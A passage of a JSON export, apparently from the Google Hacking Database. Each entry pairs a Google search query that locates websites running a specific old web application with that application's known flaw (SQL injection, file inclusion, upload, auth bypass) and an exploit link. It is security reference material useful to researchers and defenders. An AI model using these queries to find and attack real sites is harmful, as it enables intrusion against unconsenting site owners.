"https://www.exploit-db.com/ghdb/2118/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+apt-webservice+;apt-webshop-system+v3.0", "shortDescription": "powered by apt-webservice ;apt-webshop-system v3.0", "textualDescription": "APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14528" }, { "signatureReferenceNumber": "2121", "link": "https://www.exploit-db.com/ghdb/2121/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Maian+Music+v1.0.+Copyright+%C3%82%C2%A9+2007-2008+Maian+Script+World.+All+Rights+Reserved.", "shortDescription": "Maian Music v1.0. Copyright \u00c2\u00a9 2007-2008 Maian Script World. All Rights Reserved.", "textualDescription": "Maian Music 1.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6051" }, { "signatureReferenceNumber": "2123", "link": "https://www.exploit-db.com/ghdb/2123/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/wp-content/plugins/wpSS/", "shortDescription": "inurl:/wp-content/plugins/wpSS/", "textualDescription": "Wordpress Plugin Spreadsheet 0.6 SQL Injection Vulnerability - CVE: 2008-1982: http://www.exploit-db.com/exploits/5486" }, { "signatureReferenceNumber": "2125", "link": "https://www.exploit-db.com/ghdb/2125/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powerd+by+www.e-webtech.com%22", "shortDescription": "\"Powerd by www.e-webtech.com\"", "textualDescription": "e-webtech (new.asp?id=) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12547" }, { "signatureReferenceNumber": "2126", "link": "https://www.exploit-db.com/ghdb/2126/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_billboardmanager.asp%3FItemID%3D", "shortDescription": "inurl:inc_billboardmanager.asp?ItemID=", "textualDescription": "DMXReady Billboard Manager 1.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7791" }, { "signatureReferenceNumber": "2127", "link": "https://www.exploit-db.com/ghdb/2127/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl+:%22modules/recipe%22", "shortDescription": "allinurl :\"modules/recipe\"", "textualDescription": "XOOPS Module Recipe (detail.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5473" }, { "signatureReferenceNumber": "2129", "link": "https://www.exploit-db.com/ghdb/2129/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+php+advanced+transfer+manager%22", "shortDescription": "\"powered by php advanced transfer manager\"", "textualDescription": "phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability - CVE: 2007-2659: http://www.exploit-db.com/exploits/3918" }, { "signatureReferenceNumber": "2130", "link": "https://www.exploit-db.com/ghdb/2130/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+GeN4%22", "shortDescription": "\"Powered by GeN4\"", "textualDescription": "PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14086" }, { "signatureReferenceNumber": "2131", "link": "https://www.exploit-db.com/ghdb/2131/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+Gravity+Board+X+v2.0+BETA%22", "shortDescription": "\"Powered By Gravity Board X v2.0 BETA\"", "textualDescription": "Gravity Board X 2.0b SQL Injection / Post Auth Code Execution - CVE: 2008-2996: http://www.exploit-db.com/exploits/8350" }, { "signatureReferenceNumber": "2132", "link": "https://www.exploit-db.com/ghdb/2132/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_flippingbook", "shortDescription": "inurl:com_flippingbook", "textualDescription": "Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability - CVE: 2008-2095: http://www.exploit-db.com/exploits/5484" }, { "signatureReferenceNumber": "2133", "link": "https://www.exploit-db.com/ghdb/2133/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Help+desk+software+by+United+Web+Coders+rev.+3.0.640%22", "shortDescription": "\"Help desk software by United Web Coders rev. 3.0.640\"", "textualDescription": "Trouble Ticket Software ttx.cgi Remote File Download: http://www.exploit-db.com/exploits/11823" }, { "signatureReferenceNumber": "2135", "link": "https://www.exploit-db.com/ghdb/2135/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by++vlBook+1.21%22", "shortDescription": "\"Powered by vlBook 1.21\"", "textualDescription": "vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities - CVE: 2008-2073: http://www.exploit-db.com/exploits/5529" }, { "signatureReferenceNumber": "2136", "link": "https://www.exploit-db.com/ghdb/2136/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+%C3%82%C2%A9++Rotator+2008", "shortDescription": "Copyright \u00c2\u00a9 Rotator 2008", "textualDescription": "YourFreeWorld URL Rotator (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6949" }, { "signatureReferenceNumber": "2137", "link": "https://www.exploit-db.com/ghdb/2137/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:tr.php%3Fid%3D+Reminder+Service", "shortDescription": "inurl:tr.php?id= Reminder Service", "textualDescription": "YourFreeWorld Reminder Service (id) SQL Injection Vulnerability - CVE: 2008-4881: http://www.exploit-db.com/exploits/6943" }, { "signatureReferenceNumber": "2138", "link": "https://www.exploit-db.com/ghdb/2138/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Jevonweb+Guestbook%22", "shortDescription": "\"Jevonweb Guestbook\"", "textualDescription": "Jevonweb Guestbook Remote Admin Access: http://www.exploit-db.com/exploits/10665" }, { "signatureReferenceNumber": "2139", "link": "https://www.exploit-db.com/ghdb/2139/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_contactusmanager.asp", "shortDescription": "inurl:inc_contactusmanager.asp", "textualDescription": "DMXReady Contact Us Manager 1.1 Remote Contents Change Vuln: http://www.exploit-db.com/exploits/7768" }, { "signatureReferenceNumber": "2140", "link": "https://www.exploit-db.com/ghdb/2140/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_neorecruit", "shortDescription": "inurl:com_neorecruit", "textualDescription": "Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14570" }, { "signatureReferenceNumber": "2141", "link": "https://www.exploit-db.com/ghdb/2141/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_mdigg%22", "shortDescription": "\"index.php?option=com_mdigg\"", "textualDescription": "Joomla Component com_mdigg SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10847" }, { "signatureReferenceNumber": "2142", "link": "https://www.exploit-db.com/ghdb/2142/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Uploader+by+CeleronDude.%22", "shortDescription": "\"Uploader by CeleronDude.\"", "textualDescription": "Uploader by CeleronDude 5.3.0 - Upload Vulnerability: http://www.exploit-db.com/exploits/11166" }, { "signatureReferenceNumber": "2143", "link": "https://www.exploit-db.com/ghdb/2143/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Software+PBLang+4.66z%22+AND+%22Software+PBLang+4.60%22+OR+%22Software+PBLang%22", "shortDescription": "\"Software PBLang 4.66z\" AND \"Software PBLang 4.60\" OR \"Software PBLang\"", "textualDescription": "PBLang 4.66z (temppath) Remote File Include Vulnerability - CVE: 2006-5062: http://www.exploit-db.com/exploits/2428" }, { "signatureReferenceNumber": "2144", "link": "https://www.exploit-db.com/ghdb/2144/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q='SEO+by+NuSEO.PHP'", "shortDescription": "'SEO by NuSEO.PHP'", "textualDescription": "NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability - CVE: 2007-5409: http://www.exploit-db.com/exploits/4512" }, { "signatureReferenceNumber": "2145", "link": "https://www.exploit-db.com/ghdb/2145/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Web+design+by+goffgrafix.com%22", "shortDescription": "intext:\"Web design by goffgrafix.com\"", "textualDescription": "goffgrafix Design's SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12712" }, { "signatureReferenceNumber": "2146", "link": "https://www.exploit-db.com/ghdb/2146/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+zeeways", "shortDescription": "powered by zeeways", "textualDescription": "Zeeways Technology (product_desc.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11047" }, { "signatureReferenceNumber": "2147", "link": "https://www.exploit-db.com/ghdb/2147/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Welcome+to+Exponent+CMS%22+|+%22my+new+exponent+site%22++inurl:articlemodule", "shortDescription": "\"Welcome to Exponent CMS\" | \"my new exponent site\" inurl:articlemodule", "textualDescription": "Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11349" }, { "signatureReferenceNumber": "2148", "link": "https://www.exploit-db.com/ghdb/2148/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22Shorty+(Beta)%22", "shortDescription": "intitle:\"Shorty (Beta)\"", "textualDescription": "Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/9419" }, { "signatureReferenceNumber": "2150", "link": "https://www.exploit-db.com/ghdb/2150/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Fmod%3DConcoursPhoto", "shortDescription": "inurl:index.php?mod=ConcoursPhoto", "textualDescription": "KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability - CVE: 2008-1758: http://www.exploit-db.com/exploits/5353" }, { "signatureReferenceNumber": "2151", "link": "https://www.exploit-db.com/ghdb/2151/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Copyright+MaxiSepet+%C2%A9%22", "shortDescription": "\"Copyright MaxiSepet \u00a9\"", "textualDescription": "MaxiSepet 1.0 (link) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/1900" }, { "signatureReferenceNumber": "2152", "link": "https://www.exploit-db.com/ghdb/2152/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+sabros.us", "shortDescription": "Powered by sabros.us", "textualDescription": "sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability - CVE: 2008-1799: http://www.exploit-db.com/exploits/5360" }, { "signatureReferenceNumber": "2154", "link": "https://www.exploit-db.com/ghdb/2154/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_registrationmanager.asp", "shortDescription": "inurl:inc_registrationmanager.asp", "textualDescription": "DMXReady Registration Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7784" }, { "signatureReferenceNumber": "2155", "link": "https://www.exploit-db.com/ghdb/2155/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Drumbeat%22+inurl:index02.php", "shortDescription": "\"Powered by Drumbeat\" inurl:index02.php", "textualDescription": "Drumbeat CMS SQL Injection: http://www.exploit-db.com/exploits/10575" }, { "signatureReferenceNumber": "2156", "link": "https://www.exploit-db.com/ghdb/2156/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Designed+%26+Developed+by+N.E.T+E-Commerce+Group.+All+Rights+Reserved.%22", "shortDescription": "\"Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved.\"", "textualDescription": "IranMC Arad Center (news.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6712" }, { "signatureReferenceNumber": "2157", "link": "https://www.exploit-db.com/ghdb/2157/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22You+have+not+provided+a+survey+identification+number%22", "shortDescription": "\"You have not provided a survey identification number\"", "textualDescription": "LimeSurvey 1.52 (language.php) Remote File Inclusion Vulnerability - CVE: 2007-5573: http://www.exploit-db.com/exploits/4544" }, { "signatureReferenceNumber": "2158", "link": "https://www.exploit-db.com/ghdb/2158/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+SocketMail+Lite+version+2.2.8.+Copyright+%C3%82%C2%A9+2002-2006%22", "shortDescription": "\"Powered by SocketMail Lite version 2.2.8. Copyright \u00c2\u00a9 2002-2006\"", "textualDescription": "SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability - CVE: 2007-5627: http://www.exploit-db.com/exploits/4554" }, { "signatureReferenceNumber": "2159", "link": "https://www.exploit-db.com/ghdb/2159/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+ComicShout%22", "shortDescription": "\"Powered by ComicShout\"", "textualDescription": "ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability - CVE: 2008-6425: http://www.exploit-db.com/exploits/5713" }, { "signatureReferenceNumber": "2160", "link": "https://www.exploit-db.com/ghdb/2160/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+Pixaria.+Gallery", "shortDescription": "powered by Pixaria. Gallery", "textualDescription": "Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability - CVE: 2007-2457: http://www.exploit-db.com/exploits/3733" }, { "signatureReferenceNumber": "2161", "link": "https://www.exploit-db.com/ghdb/2161/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+FlashGameScript%22", "shortDescription": "\"Powered by FlashGameScript\"", "textualDescription": "FlashGameScript 1.7 (user) Remote SQL Injection Vulnerability - CVE: 2007-3646: http://www.exploit-db.com/exploits/4161" }, { "signatureReferenceNumber": "2163", "link": "https://www.exploit-db.com/ghdb/2163/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=index.php%3Foption%3Dcom_ongallery", "shortDescription": "index.php?option=com_ongallery", "textualDescription": "Joomla Component OnGallery SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14659" }, { "signatureReferenceNumber": "2164", "link": "https://www.exploit-db.com/ghdb/2164/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+WHMCompleteSolution+-+OR+++inurl:WHMCS+++OR+++++announcements.php", "shortDescription": "Powered by WHMCompleteSolution - OR inurl:WHMCS OR announcements.php", "textualDescription": "WHMCS Control 2 (announcements.php) SQL Injection: http://www.exploit-db.com/exploits/12481" }, { "signatureReferenceNumber": "2165", "link": "https://www.exploit-db.com/ghdb/2165/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_catalogmanager.asp", "shortDescription": "inurl:inc_catalogmanager.asp", "textualDescription": "DMXReady Catalog Manager 1.1 Remote Contents Change Vuln: http://www.exploit-db.com/exploits/7766" }, { "signatureReferenceNumber": "2166", "link": "https://www.exploit-db.com/ghdb/2166/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22This+website+is+powered+by+Trio%22", "shortDescription": "\"This website is powered by Trio\"", "textualDescription": "TriO 2.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3418: http://www.exploit-db.com/exploits/6141" }, { "signatureReferenceNumber": "2168", "link": "https://www.exploit-db.com/ghdb/2168/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=content_by_cat.asp%3Fcontentid+''catid''", "shortDescription": "content_by_cat.asp?contentid ''catid''", "textualDescription": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6590" }, { "signatureReferenceNumber": "2169", "link": "https://www.exploit-db.com/ghdb/2169/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+%22pollBooth.php%3Fop%3Dresults%22pollID", "shortDescription": "allinurl: \"pollBooth.php?op=results\"pollID", "textualDescription": "Pollbooth 2.0 (pollID) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5436" }, { "signatureReferenceNumber": "2170", "link": "https://www.exploit-db.com/ghdb/2170/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=browse_videos.php%3F", "shortDescription": "browse_videos.php?", "textualDescription": "phpVID 0.9.9 (categories_type.php cat) SQL Injection Vulnerability - CVE: 2007-3610: http://www.exploit-db.com/exploits/4153" }, { "signatureReferenceNumber": "2172", "link": "https://www.exploit-db.com/ghdb/2172/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:JBSPro", "shortDescription": "inurl:JBSPro", "textualDescription": "JiRos Banner Experience 1.0 (Create Admin Bypass) - CVE: 2006-1213: http://www.exploit-db.com/exploits/1571" }, { "signatureReferenceNumber": "2174", "link": "https://www.exploit-db.com/ghdb/2174/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_joblistingmanager.asp", "shortDescription": "inurl:inc_joblistingmanager.asp", "textualDescription": "DMXReady Job Listing 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7771" }, { "signatureReferenceNumber": "2175", "link": "https://www.exploit-db.com/ghdb/2175/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Factux+le+facturier+libre+V+1.1.5%22", "shortDescription": "\"Factux le facturier libre V 1.1.5\"", "textualDescription": "Factux LFI Vulnerability: http://www.exploit-db.com/exploits/12521" }, { "signatureReferenceNumber": "2176", "link": "https://www.exploit-db.com/ghdb/2176/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Maintained+with+the+Ocean12+Contact+Manager+Pro+v1.02", "shortDescription": "Maintained with the Ocean12 Contact Manager Pro v1.02", "textualDescription": "Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities - CVE: 2008-6369: http://www.exploit-db.com/exploits/7244" }, { "signatureReferenceNumber": "2177", "link": "https://www.exploit-db.com/ghdb/2177/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=buyers_subcategories.php%3FIndustryID%3D", "shortDescription": "buyers_subcategories.php?IndustryID=", "textualDescription": "Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12245" }, { "signatureReferenceNumber": "2178", "link": "https://www.exploit-db.com/ghdb/2178/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Minerva%22", "shortDescription": "\"Powered by Minerva\"", "textualDescription": "Minerva 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability - CVE: 2006-5077: http://www.exploit-db.com/exploits/2429" }, { "signatureReferenceNumber": "2179", "link": "https://www.exploit-db.com/ghdb/2179/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22izle.asp%3Foyun%3D%22", "shortDescription": "inurl:\"izle.asp?oyun=\"", "textualDescription": "FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability - CVE: 2008-4176: http://www.exploit-db.com/exploits/6453" }, { "signatureReferenceNumber": "2180", "link": "https://www.exploit-db.com/ghdb/2180/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+%C3%82%C2%A9+Viral+Marketing+2008", "shortDescription": "Copyright \u00c2\u00a9 Viral Marketing 2008", "textualDescription": "YourFreeWorld Viral Marketing (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6941" }, { "signatureReferenceNumber": "2181", "link": "https://www.exploit-db.com/ghdb/2181/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22IDFM%3D%22+%22form.php%22", "shortDescription": "inurl:\"IDFM=\" \"form.php\"", "textualDescription": "360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability - CVE: 2008-0430: http://www.exploit-db.com/exploits/4944" }, { "signatureReferenceNumber": "2182", "link": "https://www.exploit-db.com/ghdb/2182/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_newsmanager.asp", "shortDescription": "inurl:inc_newsmanager.asp", "textualDescription": "DMXReady News Manager 1.1 Arbitrary Category Change Vuln: http://www.exploit-db.com/exploits/7752" }, { "signatureReferenceNumber": "2183", "link": "https://www.exploit-db.com/ghdb/2183/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+XAOS+systems", "shortDescription": "Powered by XAOS systems", "textualDescription": "XAOS CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14469" }, { "signatureReferenceNumber": "2184", "link": "https://www.exploit-db.com/ghdb/2184/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:inc_documentlibrarymanager.asp", "shortDescription": "inurl:inc_documentlibrarymanager.asp", "textualDescription": "DMXReady Document Library Manager 1.1 Contents Change Vuln: http://www.exploit-db.com/exploits/7769" }, { "signatureReferenceNumber": "2185", "link": "https://www.exploit-db.com/ghdb/2185/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:inc_photogallerymanager.asp", "shortDescription": "inurl:inc_photogallerymanager.asp", "textualDescription": "DMXReady Photo Gallery Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7783" }, { "signatureReferenceNumber": "2186", "link": "https://www.exploit-db.com/ghdb/2186/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+Arctic+v2.0.0", "shortDescription": "Powered by Arctic v2.0.0", "textualDescription": "Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability - CVE: 2008-3250: http://www.exploit-db.com/exploits/6097" }, { "signatureReferenceNumber": "2187", "link": "https://www.exploit-db.com/ghdb/2187/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22phpRaid%22++%22phpRaid%22+%22roster.php%3FSort%3DRace%22", "shortDescription": "inurl:\"phpRaid\" \"phpRaid\" \"roster.php?Sort=Race\"", "textualDescription": "phpRaid 3.0.7 (rss.php phpraid_dir) Remote File Inclusion: http://www.exploit-db.com/exploits/3528" }, { "signatureReferenceNumber": "2189", "link": "https://www.exploit-db.com/ghdb/2189/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22classifieds.php%3Fcat%3D%22", "shortDescription": "inurl:\"classifieds.php?cat=\"", "textualDescription": "BM Classifieds Ads SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10314" }, { "signatureReferenceNumber": "2190", "link": "https://www.exploit-db.com/ghdb/2190/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by:+Zanfi+Solutions", "shortDescription": "Powered by: Zanfi Solutions", "textualDescription": "Zanfi CMS lite 1.2 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-4158: http://www.exploit-db.com/exploits/6413" }, { "signatureReferenceNumber": "2191", "link": "https://www.exploit-db.com/ghdb/2191/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22index.php%3Foption%3Dcom_jequoteform%22", "shortDescription": "inurl:\"index.php?option=com_jequoteform\"", "textualDescription": "Joomla Component com_jequoteform - Local File Inclusion - CVE: 2010-2128: http://www.exploit-db.com/exploits/12607" }, { "signatureReferenceNumber": "2192", "link": "https://www.exploit-db.com/ghdb/2192/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+SiteX+0.7+Beta%22", "shortDescription": "\"Powered by SiteX 0.7 Beta\"", "textualDescription": "SiteX 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities - CVE: 2009-1846: http://www.exploit-db.com/exploits/8816" }, { "signatureReferenceNumber": "2193", "link": "https://www.exploit-db.com/ghdb/2193/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22freshlinks_panel/index.php%3Flinkid%22", "shortDescription": "inurl:\"freshlinks_panel/index.php?linkid\"", "textualDescription": "PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln - CVE: 2008-5074: http://www.exploit-db.com/exploits/6620" }, { "signatureReferenceNumber": "2194", "link": "https://www.exploit-db.com/ghdb/2194/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+By+WebSihirbaz%C3%84%C2%B1", "shortDescription": "Powered By WebSihirbaz\u00c4\u00b1", "textualDescription": "WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability - CVE: 2007-6556: http://www.exploit-db.com/exploits/4777" }, { "signatureReferenceNumber": "2196", "link": "https://www.exploit-db.com/ghdb/2196/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Software+Categories%22+%22Featured+Resources%22+%22Search%22", "shortDescription": "\"Software Categories\" \"Featured Resources\" \"Search\"", "textualDescription": "HotScripts Clone Script Remote SQL Injection Vulnerability - CVE: 2007-6084: http://www.exploit-db.com/exploits/4633" }, { "signatureReferenceNumber": "2197", "link": "https://www.exploit-db.com/ghdb/2197/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Website+Powered+By+Creative+SplashWorks+-+SplashSite%22", "shortDescription": "\"Website Powered By Creative SplashWorks - SplashSite\"", "textualDescription": "Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11300" }, { "signatureReferenceNumber": "2199", "link": "https://www.exploit-db.com/ghdb/2199/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:inc_paypalstoremanager.asp", "shortDescription": "inurl:inc_paypalstoremanager.asp", "textualDescription": "DMXReady PayPal Store Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7782" }, { "signatureReferenceNumber": "2200", "link": "https://www.exploit-db.com/ghdb/2200/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+By+phpCOIN+1.2.3", "shortDescription": "Powered By phpCOIN 1.2.3", "textualDescription": "phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability - CVE: 2006-4424: http://www.exploit-db.com/exploits/2254" }, { "signatureReferenceNumber": "2201", "link": "https://www.exploit-db.com/ghdb/2201/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22index.php%3Fcom_remository%22", "shortDescription": "inurl:\"index.php?com_remository\"", "textualDescription": "Joomla Component (com_remository) Remote Upload File: http://www.exploit-db.com/exploits/14811" }, { "signatureReferenceNumber": "2202", "link": "https://www.exploit-db.com/ghdb/2202/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+By:+%C2%A9+Simplicity+oF+Upload", "shortDescription": "Powered By: \u00a9 Simplicity oF Upload", "textualDescription": "Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability - CVE: 2009-4818: http://www.exploit-db.com/exploits/10568" }, { "signatureReferenceNumber": "2203", "link": "https://www.exploit-db.com/ghdb/2203/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Developed+by+Quate.net.%22", "shortDescription": "\"Developed by Quate.net.\"", "textualDescription": "Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability - CVE: 2008-1963: 